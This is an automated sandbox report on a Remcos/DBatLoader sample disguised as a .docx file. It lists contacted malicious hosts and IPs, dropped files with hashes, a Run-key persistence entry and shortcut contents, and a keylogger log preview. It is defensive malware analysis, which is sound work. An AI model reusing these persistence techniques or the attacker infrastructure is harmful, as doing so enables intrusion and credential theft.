                https://wcmanagers.com/#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000870000.00000004.00000020.00020000.00000000.sdmptrue
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://wcmanagers.com:443/Er9/233_PyemdbrdppsWz#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.000000000087A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://sectigo.com/CPS0#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://ocsp.sectigo.com0#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://geoplugin.net/json.gp/Ccolorcpl.exe, 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://wcmanagers.com/Er9/233_Pyemdbrdpps03#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0##U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore68xkn.exe, 00000016.00000002.1319214441.000001EC81CA1000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000016.00000002.1319214441.000001EC81C63000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0##U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexkn.exe, 00000016.00000002.1319214441.000001EC81C41000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.pmail.com#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmp, drbdmeyP.pif, drbdmeyP.pif, 00000003.00000001.1257794553.000000000043B000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000000.1257373309.0000000000416000.00000002.00000001.01000000.00000005.sdmp, drbdmeyP.pif.0.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://ocsp.sectigo.com0C#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://login.windows.localPSystemSettingsAdminFlows.exe, 00000028.00000002.3692868865.000002F388E38000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                108.170.55.202
                		wcmanagers.comUnited States
                		20454SSASN2UStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1466663
                Start date and time:2024-07-03 08:55:56 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 11m 57s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:42
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                renamed because original name is a hash value
                Original Sample Name:-202471.docx.pif.exe
                Detection:MAL
                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@53/21@51/1
                EGA Information:
                • Successful, ratio: 90%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 101
                • Number of non-executed functions: 180
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                • Exclude process from analysis (whitelisted): SystemSettings.exe, dllhost.exe, audiodg.exe, consent.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, cxcs.microsoft.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target xkn.exe, PID 4340 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                02:56:49API Interceptor1x Sleep call for process: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe modified
                04:49:56API Interceptor3007371x Sleep call for process: colorcpl.exe modified
                08:57:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Pyemdbrd C:\Users\Public\Pyemdbrd.url
                08:57:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Pyemdbrd C:\Users\Public\Pyemdbrd.url

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                108.170.55.202Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                  R9eF05c3nd.exeGet hashmaliciousAgentTeslaBrowse
                    rQUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                      ORDEN DEL PROYECTO.exeGet hashmaliciousAgentTeslaBrowse
                        J728NYumpJ.exeGet hashmaliciousAgentTeslaBrowse
                          rInquiry.exeGet hashmaliciousAgentTesla, Discord Token StealerBrowse
                            NEW QUOTATION FOR ORDER.exeGet hashmaliciousAgentTeslaBrowse
                              Confirmaci#U00f3n de cotizaci#U00f3n.exeGet hashmaliciousAgentTeslaBrowse
                                Soluciones de energia Nanovec.exeGet hashmaliciousAgentTeslaBrowse
                                  SS Bottmac Engineers Pvt. Ltd.pdf.exeGet hashmaliciousAgentTeslaBrowse

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    SSASN2USrQuotation.exeGet hashmaliciousAgentTeslaBrowse
                                    • 108.170.55.203
                                    http://beonlineboo.comGet hashmaliciousUnknownBrowse
                                    • 209.188.14.135
                                    Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                    • 108.170.55.203
                                    Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                                    • 108.170.55.202
                                    ORDER060424.exeGet hashmaliciousAgentTeslaBrowse
                                    • 184.95.55.27
                                    R9eF05c3nd.exeGet hashmaliciousAgentTeslaBrowse
                                    • 108.170.55.202
                                    y8116vE0F0.exeGet hashmaliciousAgentTeslaBrowse
                                    • 108.170.55.203
                                    INQUIRY.exeGet hashmaliciousAgentTeslaBrowse
                                    • 108.170.55.203
                                    PURCHASE ORDER No. 4500148605.exeGet hashmaliciousAgentTeslaBrowse
                                    • 108.170.55.203
                                    Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                                    • 108.170.55.203

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    a0e9f5d64349fb13191bc781f81f42e1pago pendientes.xlsGet hashmaliciousUnknownBrowse
                                    • 108.170.55.202
                                    fechas de pago.xlsGet hashmaliciousUnknownBrowse
                                    • 108.170.55.202
                                    457525.xlsGet hashmaliciousUnknownBrowse
                                    • 108.170.55.202
                                    0cjB1Kh8zU.msiGet hashmaliciousUnknownBrowse
                                    • 108.170.55.202
                                    SecuriteInfo.com.Win32.Evo-gen.21718.4342.exeGet hashmaliciousBlackMoonBrowse
                                    • 108.170.55.202
                                    SecuriteInfo.com.Win32.Evo-gen.21718.4342.exeGet hashmaliciousBlackMoonBrowse
                                    • 108.170.55.202
                                    1.scrGet hashmaliciousUnknownBrowse
                                    • 108.170.55.202
                                    1.scrGet hashmaliciousUnknownBrowse
                                    • 108.170.55.202
                                    SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exeGet hashmaliciousLummaCBrowse
                                    • 108.170.55.202
                                    Informational-severity alert_ Creation of forwarding_redirect rule Case ID_FqJxoz8.emlGet hashmaliciousUnknownBrowse
                                    • 108.170.55.202

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\Public\alpha.exe710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                      PO-MISA-32493.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                        New PO -39850-1064 -2084-GEN101 -Order,xls.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                          PURCHASE_ORDER.CMDGet hashmaliciousDBatLoader, RemcosBrowse
                                            ProofOfPayment.CMDGet hashmaliciousDBatLoader, Neshta, RemcosBrowse
                                              Rylorhzz.PIF.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                PO# 2011-0227160-0365-06-24,xls.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                  ProofOfPayment.CMDGet hashmaliciousDBatLoader, Neshta, RemcosBrowse
                                                    proof.cmdGet hashmaliciousDBatLoader, RemcosBrowse
                                                      SWIFT_COPY20240604.cmdGet hashmaliciousDBatLoaderBrowse
                                                        C:\Users\Public\Libraries\drbdmeyP.pif710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                          PO-MISA-32493.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            New PO -39850-1064 -2084-GEN101 -Order,xls.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                              PURCHASE_ORDER.CMDGet hashmaliciousDBatLoader, RemcosBrowse
                                                                ProofOfPayment.CMDGet hashmaliciousDBatLoader, Neshta, RemcosBrowse
                                                                  Rylorhzz.PIF.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                    PO# 2011-0227160-0365-06-24,xls.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                      ProofOfPayment.CMDGet hashmaliciousDBatLoader, Neshta, RemcosBrowse
                                                                        proof.cmdGet hashmaliciousDBatLoader, RemcosBrowse
                                                                          rINV200495000-PAYORDER0940584.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse

                                                                            Created / dropped Files

                                                                            C:\ProgramData\gaban\logs.dat

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):428
                                                                            Entropy (8bit):3.3208926935002046
                                                                            Encrypted:false
                                                                            SSDEEP:6:6lVMol3l55YcIeeDAlIfE/OS/1fmPm1gWAGfE/OSFWAZi8WAv:6lVL3DecB/OSVmlWa/OSFWr8W+
                                                                            MD5:AE19BACC9221372C637448D591CAFB06
                                                                            SHA1:81B882ECEBD44624C34A02361EE2BC008EEC4A28
                                                                            SHA-256:649BD2D85E96CA21A0ABFB35145DA75915DC0A3E43FA9C4DEB775B1BBA5F30B2
                                                                            SHA-512:083BBCB16078447954A4689D8FE2D25FF3F3F269490A0CCC5CFA89E1BAEC1B54B94D325B89357DADE45FAE31098C152EE2A53D57089A8F4F266C703D05F7F053
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\gaban\logs.dat, Author: Joe Security
                                                                            Preview:....[.2.0.2.4./.0.7./.0.3. .0.2.:.5.7.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.R.u.n.].........[.S.e.t.t.i.n.g.s.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.N.e.w. .n.o.t.i.f.i.c.a.t.i.o.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                            C:\Users\Public\Libraries\PNO

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):3
                                                                            Entropy (8bit):1.584962500721156
                                                                            Encrypted:false
                                                                            SSDEEP:3:p:p
                                                                            MD5:A5EA0AD9260B1550A14CC58D2C39B03D
                                                                            SHA1:F0AEDF295071ED34AB8C6A7692223D22B6A19841
                                                                            SHA-256:F1B2F662800122BED0FF255693DF89C4487FBDCF453D3524A42D4EC20C3D9C04
                                                                            SHA-512:7C735C613ECE191801114785C1EE26A0485CBF1E8EE2C3B85BA1AD290EF75EEC9FEDE5E1A5DC26D504701F3542E6B6457818F4C1D62448D0DB40D5F35C357D74
                                                                            Malicious:false
                                                                            Preview:1..

                                                                            C:\Users\Public\Libraries\Pyemdbrd

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):803618
                                                                            Entropy (8bit):7.398863408633209
                                                                            Encrypted:false
                                                                            SSDEEP:12288:iUCWyFBzYrow4qyU9IDu94jmPcHhMoJeonoE3HxNnrpEGOFz9cWVAfGWYHW8:iiyF1YroDq92ucmPcHa5o5IFBe+Z
                                                                            MD5:93DB1FEB88FB94D374EC047F2A92A473
                                                                            SHA1:742BDAFB4F36FAFFEC4D64148872801E0D85004F
                                                                            SHA-256:FF6CEDF6A3BD5FB08FB0A3DDA807B9E297F66652C5C237D00716916B5603A87E
                                                                            SHA-512:B5094C42D12BFA1CEDEAC22A3AE9E8C137E2714DC414D0627F31CB0D5D49FACF6EF8D0A6D778F81201A03E67642C207B1E9B7C41F739A30E06367D730BCD5F85
                                                                            Malicious:true
                                                                            Preview:...Y#..K.......#.#.&..."..#.$ ...!..''...%..'&&" .#...$."....Y#..K.&........ ...Y#..K`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuy.hhve\ppg^{regpsswyetxdku..%`...]Y.$hU.hdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdg

                                                                            C:\Users\Public\Libraries\Pyemdbrd.PIF

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1085440
                                                                            Entropy (8bit):6.781096986708226
                                                                            Encrypted:false
                                                                            SSDEEP:24576:YgjfgAhthN1aH674weG2Xiou9TBeWyKvBeI+T68sjjX:YUtNCGTBXyKv8vT6r
                                                                            MD5:B9DA5A47E1E68EF90C075DC14F8E2037
                                                                            SHA1:4AE96232817BF7B3919AA298EFC7C0D18649ED9D
                                                                            SHA-256:8DBCCD1C7BDB8DA3A34C2A4AC5C62FB6774CE2ABAC29CAF899039D19A5D27555
                                                                            SHA-512:649F021B95B4616EF7F74573F22231E4C9F27BF840EA2CBD13B588698579D4D87FDA2DB521A04FF434E76E928BBFB940AF4547C85F7B578F9585B92902A08F68
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 45%
                                                                            • Antivirus: Virustotal, Detection: 50%, Browse
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................@..............................V&.......>...................`...n...........................P......................8................................text............................... ..`.itext...5.......6.................. ..`.data...X.... ......................@....bss.....6...............................idata..V&.......(..................@....tls....4....@...........................rdata.......P......................@..@.reloc...n...`...p..................@..B.rsrc....>.......>...R..............@..@....................................@..@................................................................................................

                                                                            C:\Users\Public\Libraries\drbdmeyP.pif

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):68096
                                                                            Entropy (8bit):6.328046551801531
                                                                            Encrypted:false
                                                                            SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                            MD5:C116D3604CEAFE7057D77FF27552C215
                                                                            SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                            SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                            SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Joe Sandbox View:
                                                                            • Filename: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, Detection: malicious, Browse
                                                                            • Filename: PO-MISA-32493.cmd, Detection: malicious, Browse
                                                                            • Filename: New PO -39850-1064 -2084-GEN101 -Order,xls.exe, Detection: malicious, Browse
                                                                            • Filename: PURCHASE_ORDER.CMD, Detection: malicious, Browse
                                                                            • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
                                                                            • Filename: Rylorhzz.PIF.exe, Detection: malicious, Browse
                                                                            • Filename: PO# 2011-0227160-0365-06-24,xls.exe, Detection: malicious, Browse
                                                                            • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
                                                                            • Filename: proof.cmd, Detection: malicious, Browse
                                                                            • Filename: rINV200495000-PAYORDER0940584.cmd, Detection: malicious, Browse
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                            C:\Users\Public\Pyemdbrd.url

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF">), ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):99
                                                                            Entropy (8bit):4.98891593327246
                                                                            Encrypted:false
                                                                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMYHt3vsb50IAgv:HRYFVmTWDyz5tfE509gv
                                                                            MD5:77E5BC66C26EE0BB84A1DACF4C1EF258
                                                                            SHA1:A4992EAF129F9D9162A10A6BC65CA8836AA58A93
                                                                            SHA-256:F93B60936204F09F914E8C055E2570BDA112C26C804AD141B150F0306325FBDB
                                                                            SHA-512:CD88ACEC0E704B6F9FE82FECD2045A64209EF2748269BF1EC203FB67176B458662F7C1B5020290C9938F57FDA712A73F5D36A80B1DB3972322957A47C2D5D745
                                                                            Malicious:true
                                                                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF"..IconIndex=17..HotKey=4..

                                                                            C:\Users\Public\alpha.exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):289792
                                                                            Entropy (8bit):6.135598950357573
                                                                            Encrypted:false
                                                                            SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                            MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                            SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                            SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Joe Sandbox View:
                                                                            • Filename: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, Detection: malicious, Browse
                                                                            • Filename: PO-MISA-32493.cmd, Detection: malicious, Browse
                                                                            • Filename: New PO -39850-1064 -2084-GEN101 -Order,xls.exe, Detection: malicious, Browse
                                                                            • Filename: PURCHASE_ORDER.CMD, Detection: malicious, Browse
                                                                            • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
                                                                            • Filename: Rylorhzz.PIF.exe, Detection: malicious, Browse
                                                                            • Filename: PO# 2011-0227160-0365-06-24,xls.exe, Detection: malicious, Browse
                                                                            • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
                                                                            • Filename: proof.cmd, Detection: malicious, Browse
                                                                            • Filename: SWIFT_COPY20240604.cmd, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                                                            C:\Users\Public\ger.exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):77312
                                                                            Entropy (8bit):5.996265028984654
                                                                            Encrypted:false
                                                                            SSDEEP:1536:/ZsKjopjN/cYXsuMdCAOznsA5q+oxxhRO+sAg9RyTVZiJXpnvo/vrK:FW5nspdCbzpq+iLcqjWXpvo/vm
                                                                            MD5:227F63E1D9008B36BDBCC4B397780BE4
                                                                            SHA1:C0DB341DEFA8EF40C03ED769A9001D600E0F4DAE
                                                                            SHA-256:C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D
                                                                            SHA-512:101907B994D828C83587C483B4984F36CAF728B766CB7A417B549852A6207E2A3FE9EDC8EFF5EEAB13E32C4CF1417A3ADCCC089023114EA81974C5E6B355FED9
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
